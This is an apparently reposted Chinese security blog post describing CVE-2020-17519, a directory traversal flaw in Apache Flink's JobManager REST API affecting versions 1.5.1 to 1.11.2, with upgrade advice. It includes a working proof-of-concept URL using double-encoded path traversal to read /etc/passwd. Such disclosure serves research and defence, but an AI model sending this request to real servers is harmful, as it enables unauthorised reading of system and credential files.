Apache Flink目录遍历漏洞

  • A+
所属分类:安全漏洞


Apache Flink目录遍历漏洞

(CVE-2020-17519)



前言


Apache Flink是具有强大的流和批处理功能的开源流处理框架。


漏洞描述:


Apache Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历。


漏洞复现:


Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问到的)。

Apache Flink目录遍历漏洞



POC:

http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

Apache Flink目录遍历漏洞


影响版本:

Apache Flink 1.5.1 ~ 1.11.2


修复建议:

及时更新到最新版本。



Apache Flink目录遍历漏洞

一起学习,请关注我Apache Flink目录遍历漏洞







免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。


订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

Apache Flink目录遍历漏洞

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article

Apache Flink目录遍历漏洞

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

Apache Flink目录遍历漏洞



本文始发于微信公众号(thelostworld):Apache Flink目录遍历漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: